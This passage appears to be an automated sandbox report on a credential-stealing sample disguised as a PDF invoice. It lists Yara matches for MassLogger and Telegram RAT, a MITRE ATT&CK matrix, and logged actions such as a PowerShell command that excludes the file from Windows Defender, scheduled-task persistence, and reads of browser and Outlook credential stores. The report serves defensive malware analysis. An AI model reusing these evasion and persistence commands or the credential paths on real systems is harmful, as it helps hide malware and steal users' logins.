Source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.raw.unpack, FFDecryptor.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
Source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.raw.unpack, FFDecryptor.cs	Reference to suspicious API methods: hModuleList.Add(LoadLibrary(text9 + "\\mozglue.dll"))

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe"
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe"			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Memory written: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Memory written: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe base: 400000 value starts with: 4D5A			Jump to behavior

Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe"	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YEGIgzyAhkvT" /XML "C:\Users\user\AppData\Local\Temp\tmp3E23.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Process created: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe "C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YEGIgzyAhkvT" /XML "C:\Users\user\AppData\Local\Temp\tmp4900.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Process created: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe "C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Process created: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe "C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe"	Jump to behavior

Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Queries volume information: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Queries volume information: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Queries volume information: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Queries volume information: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected MSIL Logger

Source: Yara match	File source: 10.2.BEPZA MT103 Credit.pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.3710700225.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3710711745.0000000000413000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1285558357.00000000040F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: BEPZA MT103 Credit.pdf.exe PID: 8092, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: BEPZA MT103 Credit.pdf.exe PID: 4012, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: YEGIgzyAhkvT.exe PID: 8120, type: MEMORYSTR

Yara detected MassLogger RAT

Source: Yara match	File source: 10.2.BEPZA MT103 Credit.pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.3710711745.0000000000413000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3715408005.0000000002EC4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3714406574.0000000002E44000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1285558357.00000000040F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: BEPZA MT103 Credit.pdf.exe PID: 8092, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: BEPZA MT103 Credit.pdf.exe PID: 4012, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: YEGIgzyAhkvT.exe PID: 8120, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.3710711745.0000000000413000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3715408005.0000000002EC4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3714406574.0000000002E44000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1285558357.00000000040F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: BEPZA MT103 Credit.pdf.exe PID: 8092, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: BEPZA MT103 Credit.pdf.exe PID: 4012, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: YEGIgzyAhkvT.exe PID: 8120, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data			Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: Yara match	File source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.3710711745.0000000000413000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3715408005.0000000002EC4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3714406574.0000000002E44000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1285558357.00000000040F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: BEPZA MT103 Credit.pdf.exe PID: 8092, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: BEPZA MT103 Credit.pdf.exe PID: 4012, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: YEGIgzyAhkvT.exe PID: 8120, type: MEMORYSTR

Remote Access Functionality

Yara detected MSIL Logger

Source: Yara match	File source: 10.2.BEPZA MT103 Credit.pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.3710700225.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3710711745.0000000000413000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1285558357.00000000040F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: BEPZA MT103 Credit.pdf.exe PID: 8092, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: BEPZA MT103 Credit.pdf.exe PID: 4012, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: YEGIgzyAhkvT.exe PID: 8120, type: MEMORYSTR

Yara detected MassLogger RAT

Source: Yara match	File source: 10.2.BEPZA MT103 Credit.pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.3710711745.0000000000413000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3715408005.0000000002EC4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3714406574.0000000002E44000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1285558357.00000000040F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: BEPZA MT103 Credit.pdf.exe PID: 8092, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: BEPZA MT103 Credit.pdf.exe PID: 4012, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: YEGIgzyAhkvT.exe PID: 8120, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.3710711745.0000000000413000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3715408005.0000000002EC4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3714406574.0000000002E44000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1285558357.00000000040F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: BEPZA MT103 Credit.pdf.exe PID: 8092, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: BEPZA MT103 Credit.pdf.exe PID: 4012, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: YEGIgzyAhkvT.exe PID: 8120, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	1 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	1 Scheduled Task/Job	111 Process Injection	1 Deobfuscate/Decode Files or Information	1 Input Capture	13 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	Logon Script (Windows)	1 Scheduled Task/Job	13 Obfuscated Files or Information	Security Account Manager	11 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Software Packing	NTDS	1 Process Discovery	Distributed Component Object Model	1 Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	31 Virtualization/Sandbox Evasion	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 Masquerading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
